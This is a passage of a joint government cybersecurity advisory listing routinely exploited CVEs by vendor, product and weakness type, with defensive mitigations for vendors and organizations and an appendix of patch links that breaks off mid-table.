Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \\('Code Injection'\\)\" )\n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-29464](<https://nvd.nist.gov/vuln/detail/CVE-2022-29464> \"CVE-2022-29464\" )\n\n| \n\nWSO2\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\n[CWE-434: Unrestricted Upload of File with Dangerous Type](<https://cwe.mitre.org/data/definitions/434.html> \"CWE-434: Unrestricted Upload of File with Dangerous Type\" ) \n \n[CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924> \"CVE-2022-27924\" )\n\n| \n\nZimbra\n\n| \n\nZimbra Collaboration Suite\n\n| \n\nCommand Injection\n\n| \n\n[CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n[CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047> \"CVE-2022-22047\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows CSRSS\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-27593](<https://nvd.nist.gov/vuln/detail/CVE-2022-27593> \"CVE-2022-27593\" )\n\n| \n\nQNAP\n\n| \n\nQNAP NAS\n\n| \n\nExternally Controlled Reference\n\n| \n\n[CWE-610: Externally Controlled Reference to a Resource in Another Sphere](<https://cwe.mitre.org/data/definitions/610.html> \"CWE-610: Externally Controlled Reference to a Resource in Another Sphere\" ) \n \n[CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082> \"CVE-2022-41082\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nPrivilege Escalation\n\n| \n\nNone Listed \n \n[CVE-2022-40684](<https://nvd.nist.gov/vuln/detail/CVE-2022-40684> \"CVE-2022-40684\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS, FortiProxy, FortiSwitchManager\n\n| \n\nAuthentication Bypass\n\n| \n\n[CWE-306: Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n### **MITIGATIONS**\n\n#### **Vendors and Developers**\n\nThe authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:\n\n * **Identify repeatedly exploited classes of vulnerability. **Perform an analysis of both CVEs and known exploited vulnerabilities to understand which classes of vulnerability are identified more than others. Implement appropriate mitigations to eliminate those classes of vulnerability. For example, if a product has several instances of SQL injection vulnerabilities, ensure all database queries in the product use parameterized queries, and prohibit other forms of queries.\n * **Ensure business leaders are responsible for security. **Business leaders should ensure that proactive steps to eliminate entire classes of security vulnerabilities, rather than only making one-off patches when new vulnerabilities are discovered.\n * **Follow the SSDF** ([SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" )_)_ and implement secure design practices into each stage of the SDLC. Pay attention to: \n * Prioritizing the use of memory safe languages wherever possible [[SSDF PW 6.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Exercising due diligence when selecting software components (e.g., software libraries, modules, middleware, frameworks) to ensure robust security in consumer software products [[SSDF PW 4.1](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Setting up secure development team practices; this includes conducting peer code reviews, working to a common organization secure coding standard, and maintaining awareness of language specific security concerns [[SSDF PW.5.1, PW.7.1, PW.7.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Establishing a [vulnerability disclosure program](<https://www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained> \"Vulnerability Disclosure Programs Explained\" ) to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization [[SSDF RV.1.3](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )]. As part of this, establish processes to determine root causes of discovered vulnerabilities.\n * Using static and dynamic application security testing (SAST/DAST) tools to analyze product source code and application behavior to detect error-prone practices [[SSDF PW.7.2, PW.8.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )].\n * Configuring production-ready products to have to most secure settings as default and providing guidance on the risks of changing each setting [[SSDF PW.9.1, PW9.2](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf> \"NIST Special Publication 800-218\" )]\n * **Prioritize secure-by-default configurations** such as eliminating default passwords, implementing single sign on (SSO) technology via modern open standards, and providing high-quality audit logs to customers with no additional configuration and at no extra charge.\n * **Ensure published CVEs include the proper CWE field identifying the root cause of the vulnerability **to enable industry-wide analysis of software security and design flaws.\n\nFor more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide [Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ).\n\n#### **End-User Organizations**\n\nThe authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors\u2019 activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA\u2019s [Cross-Sector Cybersecurity Performance Goals](<https://www.cisa.gov/cross-sector-cybersecurity-performance-goals> \"Cross-Sector Cybersecurity Performance Goals\" ) for more information on CPGs, including additional recommended baseline protections.\n\n#### **_Vulnerability and Configuration Management_**\n\n * **Update software, operating systems, applications, and firmware on IT network assets in a timely manner** [CPG 1.E]. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog> \"Known Exploited Vulnerabilities Catalog\" ), especially those CVEs identified in this CSA, then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Replace end-of-life software (i.e., software no longer supported by the vendor).\n * **Routinely perform automated asset discovery** across the entire estate to identify and catalogue all the systems, services, hardware and software.\n * **Implement a robust patch management process **and centralized patch management system that establishes prioritization of patch applications [CPG 1.A]. \n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, MSPs and CSPs can expand their customer\u2019s attack surface and may introduce unanticipated risks, so organizations should proactively collaborate with their MSPs and CSPs to jointly reduce risk [CPG 1.F]. For more information and guidance, see the following resources. \n * CISA Insights Risk Considerations for Managed Service Provider Customers\n * CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider> \"How to Manage Your Security When Engaging a Managed Service Provider\" )\n * **Document secure baseline configurations for all IT/OT components**, including cloud infrastructure. Monitor, examine, and document any deviations from the initial secure baseline [CPG 2.O].\n * **Perform regular secure system backups** and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].\n * **Maintain an updated cybersecurity incident response plan** that is tested at least annually and updated within a risk informed time frame to ensure its effectiveness [CPG 2.S].\n\n#### **_Identity and Access Management_**\n\n * **Enforce phishing-resistant multifactor authentication (MFA) for all users**, without exception. [CPG 2.H].\n * **Enforce MFA on all VPN connections**. If MFA is unavailable, require employees engaging in remote work to use strong passwords [CPG 2.A, 2.B, 2.C, 2.D, 2.G].\n * **Regularly review, validate, or remove privileged accounts** (annually at a minimum) [CPG 2.D, 2.E].\n * **Configure access control under the principle of least privilege** [CPG 2.Q]. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (using non-administrative privileges where feasible). \n**Note:** See CISA\u2019s Capacity Enhancement Guide \u2013 Implementing Strong Authentication and ACSC\u2019s guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication> \"Implementing Multi-Factor Authentication\" ) for more information on authentication system hardening.\n\n#### **_Protective Controls and Architecture_**\n\n * **Properly configure and secure internet-facing network devices**, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2X]. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * **Implement Zero Trust Network Architecture (ZTNA)** to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. **Note:** See the Department of Defense\u2019s [Zero Trust Reference Architecture](<https://dodcio.defense.gov/Portals/0/Documents/Library/\\(U\\)ZT_RA_v2.0\\(U\\)_Sep22.pdf> \"Department of Defense \\(DoD\\) Zero Trust Reference Architecture\" ) for additional information on Zero Trust.\n * **Continuously monitor the attack surface** and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T]. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanner, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V].\n * Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F].\n * Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified approved versions [CPG 2.Q].\n * Use a network protocol analyzer to examine captured data, including packet-level data.\n\n#### **_Supply Chain Security_**\n\n * **Reduce third-party applications and unique system/application builds**\u2014provide exceptions only if required to support business critical functions [CPG 2.Q].\n * Ensure contracts require vendors and/or third-party service providers to: \n * Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I].\n * Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B].\n * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings.\n\n### **RESOURCES**\n\n * For information on the top vulnerabilities routinely exploited in 2016 through 2019, 2020, and 2021, see: \n * Joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a> \"Top 10 Routinely Exploited Vulnerabilities\" )\n * Joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" )\n * Joint CSA [2021 Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" )\n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n * See ACSC\u2019s [Essential Eight mitigation strategies](<https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model> \"Essential Eight Maturity Model\" ) for additional mitigations.\n * See ACSC\u2019s [Cyber Supply Chain Risk Management](<https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management> \"Cyber Supply Chain Risk Management\" ) for additional considerations and advice.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **PURPOSE**\n\nThis document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **REFERENCES**\n\n[1] [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance> \"Apache Log4j Vulnerability Guidance\" )\n\n### **VERSION HISTORY**\n\nAugust 3, 2023: Initial version.\n\n### **APPENDIX: PATCH INFORMATION AND ADDITIONAL RESOURCES FOR TOP EXPLOITED VULNERABILITIES**\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Affected Products and Versions**\n\n| \n\n**Patch Information**\n\n| \n\n**Resources** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199> \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows\" )\n\n| \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nOffice, Multiple Versions\n\n| \n\n[Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882> \"Microsoft Office Memory Corruption Vulnerability\" )\n\n| \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6\n\n| \n\n[FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests](<https://www.fortiguard.com/psirt/FG-IR-20-233> \"FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests\" )\n\n| \n\nJoint CSAs:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" )\n\n[Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a> \"Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology\" )\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12\n\n| \n\n[SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://forums.ivanti.com/s/article/SA44101?language=en_US> \"SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX\" )\n\n| \n\nCISA Alerts:\n\n[Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\nACSC Advisory:\n\n[2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software](<https://www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software> \"2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi> \"Alert - APT Actors Target U.S. and Allied Networks - update 1\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\n[Remote Desktop Services Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708> \"Remote Desktop Services Remote Code Execution Vulnerability\" )\n\n| \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nADC and Gateway version 13.0 all supported builds before 13.0.47.24\n\nNetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12\n\nSD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b\n\n| \n\n[CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance> \"CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance\" )\n\n| \n\nJoint CSAs:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n[Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a> \"Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity\" )\n\n_CCCS Alert:_\n\n[Detecting Compromises relating to Citrix CVE-2019-19781](<https://www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0> \"Alert - Detecting Compromises relating to Citrix CVE-2019-19781\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5\n\n| \n\nBIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5\n\n| \n\n[K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://my.f5.com/manage/s/article/K52145254> \"K52145254: TMUI RCE vulnerability CVE-2020-5902\" )\n\n| \n\nCISA Alert:\n\n[Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a> \"Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nWindows Server, Multiple Versions\n\n| \n\n[Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472> \"Netlogon Elevation of Privilege Vulnerability\" )\n\n| \n\nACSC Advisory:\n\n[2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)](<https://www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Advisory 2020-016: \"Zerologon\" - Netlogon Elevation of Privilege Vulnerability \\(CVE-2020-1472\\)\" )\n\nJoint CSA:\n\n[APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a> \"APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations\" )\n\n_CCCS Alert:_\n\n[Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1](<https://www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472> \"Alert - Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - update 1\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n\n| \n\n[Oracle Critical Patch Update Advisory - October 2020](<https://www.oracle.com/security-alerts/cpuoct2020traditional.html> \"Oracle Critical Patch Update Advisory - October 2020\" )\n\n| \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100, Build Version 10.x\n\n| \n\n[Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001> \"CONFIRMED ZERO-DAY VULNERABILITY IN THE SONICWALL SMA100 BUILD VERSION 10.X\" )\n\n| \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) | Microsoft | Exchange Server, Multiple Versions | [Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>) | \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a>) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Mitigate Microsoft Exchange Server Vulnerabilities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a> \"Mitigate Microsoft Exchange Server Vulnerabilities\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security version 10.0.9.x Email Security\n\n| \n\n[SonicWall Email Security pre-authentication administrative account creation vulnerability](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007> \"SONICWALL EMAIL SECURITY PRE-AUTHENTICATION ADMINISTRATIVE ACCOUNT CREATION VULNERABILITY\" )\n\n| \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Versions\n\n| \n\n[Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207> \"Microsoft Exchange Server Security Feature Bypass Vulnerability\" )\n\n| \n\nCISA Alert:\n\n[Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities](<https://www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities> \"Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities\" )\n\nACSC Alert:\n\n[Microsoft Exchange ProxyShell Targeting in Australia](<https://www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia> \"Microsoft Exchange ProxyShell Targeting in Australia\" ) \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1\n\n| \n\n[Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"Confluence Security Advisory 2022-06-02\" )\n\n| \n\nCISA Alert:\n\n[CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog](<https://www.cisa.gov/news-events/alerts/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog> \"CISA Adds One Known Exploited Vulnerability \\(CVE-2022-26134\\) to Catalog\u202f\u202f\" )\n\nACSC Alert:\n\n[Remote code execution vulnerability present in Atlassian Confluence Server and Data Center](<https://www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence> \"Remote code execution vulnerability present in Atlassian Confluence Server and Data Center\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server, Multiple Version\n\n| \n\n[Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473> \"Microsoft Exchange Server Remote Code Execution Vulnerability\" )\n\n| \n\nJoint CSA:\n\n[Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a> \"Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n| \n\nMicrosoft\n\n| \n\nMicrosoft Exchange Server 2013 Cumulative Update 23\n\nMicrosoft Exchange Server 2016 Cumulative Updates 19 and 20\n\nMicrosoft Exchange Server 2019 Cumulative Updates 8 and 9\n\n| \n\n[Microsoft Exchange Server Elevation of Privilege Vulnerability, 